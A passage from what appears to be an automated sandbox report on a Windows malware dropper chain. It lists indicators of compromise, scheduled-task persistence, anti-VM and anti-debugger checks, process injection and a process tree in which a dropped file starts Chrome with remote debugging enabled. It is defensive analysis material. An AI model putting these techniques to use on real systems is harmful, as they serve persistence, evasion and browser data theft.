upx behavioral2/memory/2624-663-0x00007FFB37580000-0x00007FFB375A3000-memory.dmp upx behavioral2/memory/2624-662-0x00007FFB26D00000-0x00007FFB27220000-memory.dmp upx behavioral2/memory/2624-661-0x00007FFB36740000-0x00007FFB3676B000-memory.dmp upx behavioral2/memory/2624-660-0x00007FFB268D0000-0x00007FFB2698C000-memory.dmp upx behavioral2/memory/2624-658-0x00007FFB26990000-0x00007FFB26BD9000-memory.dmp upx behavioral2/memory/2624-657-0x00007FFB368F0000-0x00007FFB36914000-memory.dmp upx behavioral2/memory/2624-656-0x00007FFB370A0000-0x00007FFB370B2000-memory.dmp upx behavioral2/memory/2624-655-0x00007FFB37120000-0x00007FFB37163000-memory.dmp upx behavioral2/memory/2624-654-0x00007FFB26BE0000-0x00007FFB26CFC000-memory.dmp upx behavioral2/memory/2624-652-0x00007FFB37710000-0x00007FFB3771B000-memory.dmp upx behavioral2/memory/2624-651-0x00007FFB373D0000-0x00007FFB373E4000-memory.dmp upx behavioral2/memory/2624-650-0x00007FFB28070000-0x00007FFB280F7000-memory.dmp upx behavioral2/memory/2624-649-0x00007FFB28100000-0x00007FFB281CF000-memory.dmp upx behavioral2/memory/2624-611-0x00007FFB36770000-0x00007FFB3679E000-memory.dmp upx behavioral2/memory/2624-610-0x00007FFB268D0000-0x00007FFB2698C000-memory.dmp upx behavioral2/memory/2624-609-0x00007FFB26990000-0x00007FFB26BD9000-memory.dmp upx behavioral2/memory/2624-606-0x00007FFB26D00000-0x00007FFB27220000-memory.dmp upx behavioral2/memory/2624-605-0x00007FFB368F0000-0x00007FFB36914000-memory.dmp upx behavioral2/memory/2624-599-0x00007FFB26BE0000-0x00007FFB26CFC000-memory.dmp upx behavioral2/memory/2624-597-0x00007FFB37710000-0x00007FFB3771B000-memory.dmp upx behavioral2/memory/2624-596-0x00007FFB373D0000-0x00007FFB373E4000-memory.dmp upx behavioral2/memory/2624-595-0x00007FFB3B3B0000-0x00007FFB3B3C9000-memory.dmp upx behavioral2/memory/2624-594-0x00007FFB28070000-0x00007FFB280F7000-memory.dmp upx behavioral2/memory/2624-593-0x00007FFB28100000-0x00007FFB281CF000-memory.dmp upx behavioral2/memory/2624-588-0x00007FFB27220000-0x00007FFB27809000-memory.dmp upx behavioral2/memory/2624-585-0x00007FFB37430000-0x00007FFB37466000-memory.dmp upx behavioral2/memory/2624-583-0x00007FFB39200000-0x00007FFB39219000-memory.dmp upx behavioral2/memory/2624-582-0x00007FFB3B450000-0x00007FFB3B45D000-memory.dmp upx behavioral2/memory/2624-580-0x00007FFB3B460000-0x00007FFB3B46F000-memory.dmp upx behavioral2/files/0x0007000000023e44-576.dat upx behavioral2/memory/2624-575-0x00007FFB37580000-0x00007FFB375A3000-memory.dmp upx behavioral2/files/0x0007000000023dfd-573.dat upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 2341120afd619b888c8316c0a91d39b8.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023dae-409.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 1064 3740 WerFault.exe 109 4360 4632 WerFault.exe 124 2052 5032 WerFault.exe 152 2424 3864 WerFault.exe 164 4080 220 WerFault.exe 171 1212 3732 WerFault.exe 180 3968 1552 WerFault.exe 185 4584 2580 WerFault.exe 190 5940 3592 WerFault.exe 257 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65bd8e080d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 34577fd695.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ca646f5e84.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 239247cd96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a8a078ad49.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6a88d36c36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32ce1ef777.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 529341dc7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 24ca60c2c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 65bd8e080d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2744386dc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a196a268d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 64b92fda63.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 328d864569.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 32ce1ef777.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 32ce1ef777.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1520 timeout.exe 4580 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 3220 taskkill.exe 2032 taskkill.exe 2000 taskkill.exe 2888 taskkill.exe 1452 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1616 schtasks.exe 1212 schtasks.exe 220 schtasks.exe 6284 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1784 2341120afd619b888c8316c0a91d39b8.exe 1784 2341120afd619b888c8316c0a91d39b8.exe 532 skotes.exe 532 skotes.exe 4216 powershell.exe 4216 powershell.exe 2712 powershell.exe 2712 powershell.exe 3544 powershell.exe 3544 powershell.exe 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE 4464 powershell.exe 4464 powershell.exe 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE 4576 powershell.exe 4576 powershell.exe 2924 7aencsM.exe 2924 7aencsM.exe 4876 powershell.exe 4876 powershell.exe 1788 483d2fa8a0d53818306efeb32d3.exe 1788 483d2fa8a0d53818306efeb32d3.exe 2924 7aencsM.exe 2924 7aencsM.exe 588 chrome.exe 588 chrome.exe 2664 Ta3ZyUR.exe 2664 Ta3ZyUR.exe 2664 Ta3ZyUR.exe 2664 Ta3ZyUR.exe 2896 powershell.exe 2896 powershell.exe 2896 powershell.exe 1356 powershell.exe 1356 powershell.exe 1356 powershell.exe 2664 d2YQIJa.exe 2664 d2YQIJa.exe 2924 7aencsM.exe 2924 7aencsM.exe 4312 DTQCxXZ.exe 4312 DTQCxXZ.exe 4312 DTQCxXZ.exe 4312 DTQCxXZ.exe 2664 d2YQIJa.exe 2664 d2YQIJa.exe 2664 d2YQIJa.exe 2664 d2YQIJa.exe 4896 Bjkm5hE.exe 4896 Bjkm5hE.exe 4896 Bjkm5hE.exe 4896 Bjkm5hE.exe 2924 7aencsM.exe 2924 7aencsM.exe 3416 msedge.exe 3416 msedge.exe 3416 msedge.exe 3416 msedge.exe 4972 msedge.exe 4972 msedge.exe 868 msedge.exe 868 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 588 chrome.exe 588 chrome.exe 588 chrome.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 5676 chrome.exe 5676 chrome.exe 5676 chrome.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeShutdownPrivilege 588 chrome.exe Token: SeCreatePagefilePrivilege 588 chrome.exe Token: SeDebugPrivilege 3220 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 2888 taskkill.exe Token: SeDebugPrivilege 1452 taskkill.exe Token: SeDebugPrivilege 4724 powershell.exe Token: SeDebugPrivilege 3080 firefox.exe Token: SeDebugPrivilege 3080 firefox.exe Token: SeShutdownPrivilege 5676 chrome.exe Token: SeCreatePagefilePrivilege 5676 chrome.exe Token: SeShutdownPrivilege 5676 chrome.exe Token: SeCreatePagefilePrivilege 5676 chrome.exe Token: SeDebugPrivilege 6176 64b92fda63.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1784 2341120afd619b888c8316c0a91d39b8.exe 4604 amnew.exe 1192 239247cd96.exe 1192 239247cd96.exe 1192 239247cd96.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 588 chrome.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 868 msedge.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 1976 a8a078ad49.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 1192 239247cd96.exe 1192 239247cd96.exe 1192 239247cd96.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 1976 a8a078ad49.exe 1976 a8a078ad49.exe 1976 a8a078ad49.exe 2100 65bd8e080d.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 3080 firefox.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe 2100 65bd8e080d.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3080 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1784 wrote to memory of 532 1784 2341120afd619b888c8316c0a91d39b8.exe 87 PID 1784 wrote to memory of 532 1784 2341120afd619b888c8316c0a91d39b8.exe 87 PID 1784 wrote to memory of 532 1784 2341120afd619b888c8316c0a91d39b8.exe 87 PID 532 wrote to memory of 4604 532 skotes.exe 88 PID 532 wrote to memory of 4604 532 skotes.exe 88 PID 532 wrote to memory of 4604 532 skotes.exe 88 PID 4604 wrote to memory of 3440 4604 amnew.exe 89 PID 4604 wrote to memory of 3440 4604 amnew.exe 89 PID 4604 wrote to memory of 3440 4604 amnew.exe 89 PID 532 wrote to memory of 1192 532 skotes.exe 90 PID 532 wrote to memory of 1192 532 skotes.exe 90 PID 532 wrote to memory of 1192 532 skotes.exe 90 PID 1192 wrote to memory of 1460 1192 239247cd96.exe 91 PID 1192 wrote to memory of 1460 1192 239247cd96.exe 91 PID 1192 wrote to memory of 1460 1192 239247cd96.exe 91 PID 1192 wrote to memory of 3068 1192 239247cd96.exe 92 PID 1192 wrote to memory of 3068 1192 239247cd96.exe 92 PID 1192 wrote to memory of 3068 1192 239247cd96.exe 92 PID 1460 wrote to memory of 1616 1460 cmd.exe 94 PID 1460 wrote to memory of 1616 1460 cmd.exe 94 PID 1460 wrote to memory of 1616 1460 cmd.exe 94 PID 3068 wrote to memory of 4216 3068 mshta.exe 95 PID 3068 wrote to memory of 4216 3068 mshta.exe 95 PID 3068 wrote to memory of 4216 3068 mshta.exe 95 PID 532 wrote to memory of 3824 532 skotes.exe 97 PID 532 wrote to memory of 3824 532 skotes.exe 97 PID 532 wrote to memory of 3824 532 skotes.exe 97 PID 3824 wrote to memory of 844 3824 cmd.exe 99 PID 3824 wrote to memory of 844 3824 cmd.exe 99 PID 3824 wrote to memory of 844 3824 cmd.exe 99 PID 844 wrote to memory of 1520 844 cmd.exe 101 PID 844 wrote to memory of 1520 844 cmd.exe 101 PID 844 wrote to memory of 1520 844 cmd.exe 101 PID 844 wrote to memory of 4744 844 cmd.exe 102 PID 844 wrote to memory of 4744 844 cmd.exe 102 PID 844 wrote to memory of 4744 844 cmd.exe 102 PID 4744 wrote to memory of 2712 4744 cmd.exe 103 PID 4744 wrote to memory of 2712 4744 cmd.exe 103 PID 4744 wrote to memory of 2712 4744 cmd.exe 103 PID 844 wrote to memory of 4896 844 cmd.exe 104 PID 844 wrote to memory of 4896 844 cmd.exe 104 PID 844 wrote to memory of 4896 844 cmd.exe 104 PID 4896 wrote to memory of 3544 4896 cmd.exe 105 PID 4896 wrote to memory of 3544 4896 cmd.exe 105 PID 4896 wrote to memory of 3544 4896 cmd.exe 105 PID 4216 wrote to memory of 4936 4216 powershell.exe 106 PID 4216 wrote to memory of 4936 4216 powershell.exe 106 PID 4216 wrote to memory of 4936 4216 powershell.exe 106 PID 844 wrote to memory of 4000 844 cmd.exe 107 PID 844 wrote to memory of 4000 844 cmd.exe 107 PID 844 wrote to memory of 4000 844 cmd.exe 107 PID 4000 wrote to memory of 4464 4000 cmd.exe 108 PID 4000 wrote to memory of 4464 4000 cmd.exe 108 PID 4000 wrote to memory of 4464 4000 cmd.exe 108 PID 532 wrote to memory of 3740 532 skotes.exe 109 PID 532 wrote to memory of 3740 532 skotes.exe 109 PID 532 wrote to memory of 3740 532 skotes.exe 109 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 PID 3740 wrote to memory of 2924 3740 7aencsM.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2341120afd619b888c8316c0a91d39b8.exe"C:\Users\Admin\AppData\Local\Temp\2341120afd619b888c8316c0a91d39b8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Users\Admin\AppData\Local\Temp\1085329001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1085329001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2624
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 8206⤵
- Program crash
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:220 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
PID:2476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 9686⤵
- Program crash
PID:4080
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:3900
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3732 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 9646⤵
- Program crash
PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\10006950101\32ce1ef777.exe"C:\Users\Admin\AppData\Local\Temp\10006950101\32ce1ef777.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2580 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:5676 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2574cc40,0x7ffb2574cc4c,0x7ffb2574cc587⤵PID:5752
-
-
